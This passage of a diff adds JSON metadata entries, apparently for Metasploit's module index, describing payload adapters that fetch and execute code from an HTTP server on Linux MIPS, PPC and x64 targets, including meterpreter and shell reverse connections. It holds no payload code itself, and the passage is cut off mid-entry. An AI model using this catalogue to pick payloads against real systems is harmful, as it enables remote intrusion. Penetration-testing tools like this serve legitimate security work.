"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/exec", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, 
+ "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/http/mipsbe/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + 
"description": "Fetch and execute an MIPSBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/reboot": { + "name": "HTTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/http/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", 
+ "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/reboot", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/http/mipsbe/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, 
+ "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsle/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/exec", + "staged": false + }, + "payload_cmd/linux/http/mipsle/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", 
+ "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/http/mipsle/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_http", + "staged": false + }, + 
"payload_cmd/linux/http/mipsle/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/mipsle/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 
8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsle/reboot": { + "name": "HTTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/http/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/reboot", + "staged": false + }, + "payload_cmd/linux/http/mipsle/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 
13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/http/mipsle/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsle/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + 
"rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:49 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/ppc/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_https", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:49 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/ppc/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:49 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc64/shell_bind_tcp": { + "name": 
"HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:57 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64", + "adapted_refname": "linux/ppc64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc64/shell_find_port": { + "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/http/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:57 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/linux/http/ppc64", + "adapted_refname": "linux/ppc64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/http/ppc64/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:57 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64", + "adapted_refname": "linux/ppc64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc64le/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_http", 
+ "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/ppc64le/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/ppc64le/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": 
"/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/exec", + "staged": false + }, + "payload_cmd/linux/http/x64/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + 
